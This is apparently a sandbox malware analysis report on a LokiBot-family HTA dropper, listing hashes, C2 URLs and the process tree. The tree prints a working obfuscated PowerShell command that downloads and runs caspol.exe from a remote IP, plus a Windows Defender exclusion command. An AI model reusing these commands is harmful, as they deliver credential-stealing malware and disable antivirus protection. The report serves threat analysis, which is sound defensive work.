Analysis
-
max time kernel
138s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 17:43
Static task
static1
Behavioral task
behavioral1
Sample
seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
Resource
win10v2004-20241007-en
General
-
Target
seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
-
Size
178KB
-
MD5
a54bdd270a424ec79b735ef6b513c2e4
-
SHA1
465738a3e31b16ad80c44f3dc7bdd762e402cb51
-
SHA256
dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21
-
SHA512
598f303f9f570851f3e538dcd5d9e23717e177b3e652320a7d58dc4800a0f81d9445b719e51b0875b640460c1b4d6be7a592e738b1004c2c0490bffac8ba0c61
-
SSDEEP
96:4vCl1722AAZtbZfjdDINnmScJXD65zbfKZ/UQ:4vCld22AAVjBIcyzbfyUQ
Malware Config
Extracted
lokibot
http://94.156.177.95/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
Processes:
pOWERSHELl.exEflow pid process 3 2860 pOWERSHELl.exE -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
Processes:
pOWERSHELl.exEpowershell.exepid process 2860 pOWERSHELl.exE 2976 powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
caspol.execaspol.execaspol.exepid process 396 caspol.exe 688 caspol.exe 1972 caspol.exe -
Loads dropped DLL 3 IoCs
Processes:
pOWERSHELl.exEpid process 2860 pOWERSHELl.exE 2860 pOWERSHELl.exE 2860 pOWERSHELl.exE -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
caspol.exedescription pid process target process PID 396 set thread context of 1972 396 caspol.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
caspol.exepowershell.exemshta.exepOWERSHELl.exEpowershell.execsc.execvtres.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWERSHELl.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
pOWERSHELl.exEpowershell.execaspol.exepowershell.exepid process 2860 pOWERSHELl.exE 2976 powershell.exe 396 caspol.exe 396 caspol.exe 2408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
pOWERSHELl.exEpowershell.execaspol.exepowershell.execaspol.exedescription pid process Token: SeDebugPrivilege 2860 pOWERSHELl.exE Token: SeDebugPrivilege 2976 powershell.exe Token: SeDebugPrivilege 396 caspol.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 1972 caspol.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
mshta.exepOWERSHELl.exEcsc.execaspol.exedescription pid process target process PID 2856 wrote to memory of 2860 2856 mshta.exe pOWERSHELl.exE PID 2856 wrote to memory of 2860 2856 mshta.exe pOWERSHELl.exE PID 2856 wrote to memory of 2860 2856 mshta.exe pOWERSHELl.exE PID 2856 wrote to memory of 2860 2856 mshta.exe pOWERSHELl.exE PID 2860 wrote to memory of 2976 2860 pOWERSHELl.exE powershell.exe PID 2860 wrote to memory of 2976 2860 pOWERSHELl.exE powershell.exe PID 2860 wrote to memory of 2976 2860 pOWERSHELl.exE powershell.exe PID 2860 wrote to memory of 2976 2860 pOWERSHELl.exE powershell.exe PID 2860 wrote to memory of 2732 2860 pOWERSHELl.exE csc.exe PID 2860 wrote to memory of 2732 2860 pOWERSHELl.exE csc.exe PID 2860 wrote to memory of 2732 2860 pOWERSHELl.exE csc.exe PID 2860 wrote to memory of 2732 2860 pOWERSHELl.exE csc.exe PID 2732 wrote to memory of 2428 2732 csc.exe cvtres.exe PID 2732 wrote to memory of 2428 2732 csc.exe cvtres.exe PID 2732 wrote to memory of 2428 2732 csc.exe cvtres.exe PID 2732 wrote to memory of 2428 2732 csc.exe cvtres.exe PID 2860 wrote to memory of 396 2860 pOWERSHELl.exE caspol.exe PID 2860 wrote to memory of 396 2860 pOWERSHELl.exE caspol.exe PID 2860 wrote to memory of 396 2860 pOWERSHELl.exE caspol.exe PID 2860 wrote to memory of 396 2860 pOWERSHELl.exE caspol.exe PID 396 wrote to memory of 2408 396 caspol.exe powershell.exe PID 396 wrote to memory of 2408 396 caspol.exe powershell.exe PID 396 wrote to memory of 2408 396 caspol.exe powershell.exe PID 396 wrote to memory of 2408 396 caspol.exe powershell.exe PID 396 wrote to memory of 688 396 caspol.exe caspol.exe PID 396 wrote to memory of 688 396 caspol.exe caspol.exe PID 396 wrote to memory of 688 396 caspol.exe caspol.exe PID 396 wrote to memory of 688 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe PID 396 wrote to memory of 1972 396 caspol.exe caspol.exe -
outlook_office_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-v0m6v9w.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8F84.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8F83.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2428
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
PID:688
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1972
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ef0af324e276c036b354d347eda6a9f0
SHA1fce09e350dcc93553f4ee3368de296654a506276
SHA2565680d4fa8e0908c392cd002b7ae9a3ba274881ef7825ea0e58e29f0b0481c096
SHA51261d7ea150b13c49e6c0511376a92357bdbcff9b77b130b0c4f9b930cabc6a696e9c83d5e0337627d1dedd743d07a87cb27718cad279ab7d676ce4bb5ec3b3091
-
Filesize
7KB
MD5cf6d08a8a89b232d6347fc1d59151c33
SHA1398bb2d8038c58079e2a942452740b1ec5314c96
SHA256665aeaffd3db6a88d74d1dc8311a188ea09eec0ac58363d5d0d18ce5512cacd4
SHA512b5088072cb8839b5605b51bed85814c9cb14988a4d67320283558e6f696314b5ef040752db0dba83b4d6f36b140e4dec1188dc0dee515971e56aa47276f6ab40
-
Filesize
1KB
MD56791bb337452ee08248ddb033881e14b
SHA1ea33942b92b667a0e438511c5531d875abe562cd
SHA256445e708e979c0932591d0b0e5fb1be3877609bbad11786a686a307263bfdf8e8
SHA5121fa03eb67559561a3b83f4510ae5b73f4b31134c3ec4730f9bb70aca825af9a47ad620a003671df08087347d0cd0ad3bca5fd1df02d4dead73c15f305d74e0a4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5a7f0b7aaef12cefc20ee674da45e790f
SHA11a211ccbf163a1a3fd5144ea956020b368e90fee
SHA256d9fe1a79e83d292921c3dde512d00817e56d7d72ea3dfb2627678bff44786f1e
SHA51263c2e558a809750834702fb104f0d72d187e8f13a5a89f1f259f37ea4ba4a2ea388eacb138255b84110cee812396786febc876f2d5e68ada5d84ae9ad235b105
-
Filesize
570KB
MD580358303e33cef71434e6e4a621262c5
SHA1e7a22b4e5af741f9b4d9982f36164b276bba459a
SHA256f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7
SHA5125e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e
-
Filesize
477B
MD5f97fc8141f59078b4354b513d3b083ac
SHA1293904ab8d5f38a2f0764ee2e35e97e590d8c737
SHA256f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e
SHA51287b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c
-
Filesize
309B
MD5ef1cf38b1128bbcf2c1025da41b6ff90
SHA1bd3f454db19acf9c27c77e4d3d51dc0d0727823e
SHA2562cbee7ad77f0e5b7a7044063a0865282d3887f1dcbd8d80338bc4536e9af89dc
SHA51286e7d676bff8f7be88508dde532386428780986f7701c92553664f2c3195f8a42a94f5ab243f3c9547cfa3240836bb0f4c0af1e475d62a6196ccb1214fd5e444
-
Filesize
652B
MD556413a61aae1612af11929f20f4da8c3
SHA17e35ec3dc22b24d93b6f3b0acef04e97119abddd
SHA256343e79addeceaa8f9cca36a35cb569f72b9502c27d0fd1cc6d558768abc2e0e1
SHA512248a5d738108990fa6bf1374079b5e0ab449c2bb6a693438dfdeccd207601861b39d0e23efb9a477b588435cbccbe1f1ef12c9b29c75d5b7dcfa2f070461ba41